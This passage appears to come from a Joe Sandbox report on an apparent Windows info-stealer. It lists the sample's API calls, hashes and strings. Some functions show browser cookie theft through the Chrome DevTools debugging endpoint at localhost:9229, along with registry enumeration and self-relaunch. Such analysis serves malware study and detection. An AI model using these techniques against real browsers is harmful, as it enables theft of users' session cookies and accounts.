                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00531B02
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen
                          • String ID:
                          • API String ID: 1049500425-0
                          • Opcode ID: ba024e8220f9b0aa2b64a1ac417f01a51da3012f17fa54d3baa4a98d7bbaae7f
                          • Instruction ID: 60064d6ac0d430abed7ff0bf60015ac023929ac325fdc97011409979cdbeb569
                          • Opcode Fuzzy Hash: ba024e8220f9b0aa2b64a1ac417f01a51da3012f17fa54d3baa4a98d7bbaae7f
                          • Instruction Fuzzy Hash: CC9151B5601B079FE7209FB9DC88A5BBBE9FF45301F148829B986C3251DB78D881CB54
                          Function 00524760 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00524793
                          • LocalAlloc.KERNEL32(00000040,?), ref: 005247C5
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00524812
                          • lstrlen.KERNEL32(00544B60), ref: 0052481D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052483A
                          • lstrcat.KERNEL32(00000000,00544B60), ref: 00524846
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052486B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00524898
                          • lstrcat.KERNEL32(00000000,00000000), ref: 005248A3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005248CA
                          • StrStrA.SHLWAPI(?,00000000), ref: 005248DC
                          • lstrlen.KERNEL32(?), ref: 005248F0
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00524931
                          • lstrcpy.KERNEL32(00000000,?), ref: 005249B8
                          • lstrcpy.KERNEL32(00000000,?), ref: 005249E1
                          • lstrcpy.KERNEL32(00000000,?), ref: 00524A0A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00524A30
                          • lstrcpy.KERNEL32(00000000,?), ref: 00524A5D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 4107348322-3310892237
                          • Opcode ID: ea50acda86223c671137fd0177f7c1c9e59eeed1fcac53513853bff799d4fc66
                          • Instruction ID: 5b455c72c55f9b63f4eaf0b40c7b1b9434b9baae830321f421da7b0906c5c903
                          • Opcode Fuzzy Hash: ea50acda86223c671137fd0177f7c1c9e59eeed1fcac53513853bff799d4fc66
                          • Instruction Fuzzy Hash: 3BB19375A1121A9BDB21EF78E8899DF7FB6BF85700F044428F846A7251DB34EC858F90
                          Function 005192B0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 005190C0: InternetOpenA.WININET(0053CFEC,00000001,00000000,00000000,00000000), ref: 005190DF
                            • Part of subcall function 005190C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 005190FC
                            • Part of subcall function 005190C0: InternetCloseHandle.WININET(00000000), ref: 00519109
                          • strlen.MSVCRT ref: 005192E1
                          • strlen.MSVCRT ref: 005192FA
                            • Part of subcall function 00518980: std::_Xinvalid_argument.LIBCPMT ref: 00518996
                          • strlen.MSVCRT ref: 00519399
                          • strlen.MSVCRT ref: 005193E6
                          • lstrcat.KERNEL32(?,cookies), ref: 00519547
                          • lstrcat.KERNEL32(?,00541794), ref: 00519559
                          • lstrcat.KERNEL32(?,?), ref: 0051956A
                          • lstrcat.KERNEL32(?,00544B98), ref: 0051957C
                          • lstrcat.KERNEL32(?,?), ref: 0051958D
                          • lstrcat.KERNEL32(?,.txt), ref: 0051959F
                          • lstrlen.KERNEL32(?), ref: 005195B6
                          • lstrlen.KERNEL32(?), ref: 005195DB
                          • lstrcpy.KERNEL32(00000000,?), ref: 00519614
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                          • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                          • API String ID: 1201316467-3542011879
                          • Opcode ID: b815e2e499899a46c003ac2cf795ff948abab874d829733de01243f3a84cdc27
                          • Instruction ID: 19437b6ae5e09d305ac913bd87947dddf87a2d8b738ca2eb2f459cbdb79d9868
                          • Opcode Fuzzy Hash: b815e2e499899a46c003ac2cf795ff948abab874d829733de01243f3a84cdc27
                          • Instruction Fuzzy Hash: A1E14871E10219DFEF10DFA8D894ADEBBB5BF48300F1044A9E509A7281DB74AE85CF91
                          Function 0052D980 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0052D9A1
                          • memset.MSVCRT ref: 0052D9B3
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0052D9DB
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052DA0E
                          • lstrcat.KERNEL32(?,00000000), ref: 0052DA1C
                          • lstrcat.KERNEL32(?,011ADF18), ref: 0052DA36
                          • lstrcat.KERNEL32(?,?), ref: 0052DA4A
                          • lstrcat.KERNEL32(?,011ACFC8), ref: 0052DA5E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052DA8E
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0052DA95
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052DAFE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 2367105040-0
                          • Opcode ID: 4c9a00387967acc14ab2920bf87579616b52271d697ffa98b66f17370db9970f
                          • Instruction ID: 87148b9d933589573bb039002df7294948b1bc479b8d7157e59e06ee93e83375
                          • Opcode Fuzzy Hash: 4c9a00387967acc14ab2920bf87579616b52271d697ffa98b66f17370db9970f
                          • Instruction Fuzzy Hash: A9B181B591022A9FDB10EFA4DC889EE7BB9BF89300F148565F905A7250DB349E84CF60
                          Function 0051B309 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051B330
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051B37E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051B3A9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051B3B1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051B3D9
                          • lstrlen.KERNEL32(00544C50), ref: 0051B450
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051B474
                          • lstrcat.KERNEL32(00000000,00544C50), ref: 0051B480
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051B4A9
                          • lstrlen.KERNEL32(00000000), ref: 0051B52D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051B557
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051B55F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051B587
                          • lstrlen.KERNEL32(00544AD4), ref: 0051B5FE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051B622
                          • lstrcat.KERNEL32(00000000,00544AD4), ref: 0051B62E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051B65E
                          • lstrlen.KERNEL32(?), ref: 0051B767
                          • lstrlen.KERNEL32(?), ref: 0051B776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051B79E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID:
                          • API String ID: 2500673778-0
                          • Opcode ID: cbf9a1812a94f5d13000bbf45517fb6f291a33a9d2a4076f652eddd37a0a65da
                          • Instruction ID: b35cb26d3993d6c749cf8b951175c47ab5918e1656c605a8c56ff40c7c63e3cc
                          • Opcode Fuzzy Hash: cbf9a1812a94f5d13000bbf45517fb6f291a33a9d2a4076f652eddd37a0a65da
                          • Instruction Fuzzy Hash: 74025134A012068FFB25DF65D989AAABFB1BF45304F19C069E5099B261D775DCC2CF80
                          Function 00533760 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 005371E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 005371FE
                          • RegOpenKeyExA.ADVAPI32(?,011AAF30,00000000,00020019,?), ref: 005337BD
                          • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 005337F7
                          • wsprintfA.USER32 ref: 00533822
                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00533840
                          • RegCloseKey.ADVAPI32(?), ref: 0053384E
                          • RegCloseKey.ADVAPI32(?), ref: 00533858
                          • RegQueryValueExA.ADVAPI32(?,011ADA68,00000000,000F003F,?,?), ref: 005338A1
                          • lstrlen.KERNEL32(?), ref: 005338B6
                          • RegQueryValueExA.ADVAPI32(?,011ADB10,00000000,000F003F,?,00000400), ref: 00533927
                          • RegCloseKey.ADVAPI32(?), ref: 00533972
                          • RegCloseKey.ADVAPI32(?), ref: 00533989
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 13140697-3278919252
                          • Opcode ID: 381c3a9e88396509c163c5e2b4ea623b61688209444c477cf65b3a1c8d1b21b7
                          • Instruction ID: a5edb3bd02fedbb48ae9ba5676d1dc5d76385c1bbe2e1baab7109f911d94645d
                          • Opcode Fuzzy Hash: 381c3a9e88396509c163c5e2b4ea623b61688209444c477cf65b3a1c8d1b21b7
                          • Instruction Fuzzy Hash: FA915EB6D00209DFCB10DF94DD84AEEBBB9FB88314F14856AE509A7211D7359E45CF90
                          Function 005190C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                          Download Yara Rule
                          APIs
                          • InternetOpenA.WININET(0053CFEC,00000001,00000000,00000000,00000000), ref: 005190DF
                          • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 005190FC
                          • InternetCloseHandle.WININET(00000000), ref: 00519109
                          • InternetReadFile.WININET(?,?,?,00000000), ref: 00519166
                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00519197
                          • InternetCloseHandle.WININET(00000000), ref: 005191A2
                          • InternetCloseHandle.WININET(00000000), ref: 005191A9
                          • strlen.MSVCRT ref: 005191BA
                          • strlen.MSVCRT ref: 005191ED
                          • strlen.MSVCRT ref: 0051922E
                          • strlen.MSVCRT ref: 0051924C
                            • Part of subcall function 00518980: std::_Xinvalid_argument.LIBCPMT ref: 00518996
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                          • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                          • API String ID: 1530259920-2144369209
                          • Opcode ID: 734ca699a1084289b3d55bda7c6aff558ae48fd1de82202298ec96a0e23d4122
                          • Instruction ID: 4738d881879159bd6a2b3b69964db6061ec9e421a80bfb36be4450c835ae0555
                          • Opcode Fuzzy Hash: 734ca699a1084289b3d55bda7c6aff558ae48fd1de82202298ec96a0e23d4122
                          • Instruction Fuzzy Hash: FD51C871640209ABEB20DBA4DC49BEEFFF9FF49710F14416AF504E3280DBB599848B65
                          Function 00531660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 005316A1
                          • lstrcpy.KERNEL32(00000000,0119B018), ref: 005316CC
                          • lstrlen.KERNEL32(?), ref: 005316D9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005316F6
                          • lstrcat.KERNEL32(00000000,?), ref: 00531704
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0053172A
                          • lstrlen.KERNEL32(011A9CE8), ref: 0053173F
                          • lstrcpy.KERNEL32(00000000,?), ref: 00531762
                          • lstrcat.KERNEL32(00000000,011A9CE8), ref: 0053176A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00531792
                          • ShellExecuteEx.SHELL32(?), ref: 005317CD
                          • ExitProcess.KERNEL32 ref: 00531803
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                          • String ID: <
                          • API String ID: 3579039295-4251816714
                          • Opcode ID: 15338c704619d916de57bea729a2d69ad883662add1918e5606794be38c57aae
                          • Instruction ID: 1ee5edfd00401ae80bf72beed1994e0e259ac0f4b28d620a56ad45bd8b15475d
                          • Opcode Fuzzy Hash: 15338c704619d916de57bea729a2d69ad883662add1918e5606794be38c57aae
                          • Instruction Fuzzy Hash: 6851747490161A9BDB21DFB4CC84ADEBBF9FF89300F048126E505E3251DB74AE45CB98
                          Function 0052EFB0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052EFE4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052F012
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0052F026
                          • lstrlen.KERNEL32(00000000), ref: 0052F035
                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 0052F053
                          • StrStrA.SHLWAPI(00000000,?), ref: 0052F081
                          • lstrlen.KERNEL32(?), ref: 0052F094
                          • lstrlen.KERNEL32(00000000), ref: 0052F0B2
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 0052F0FF
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 0052F13F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
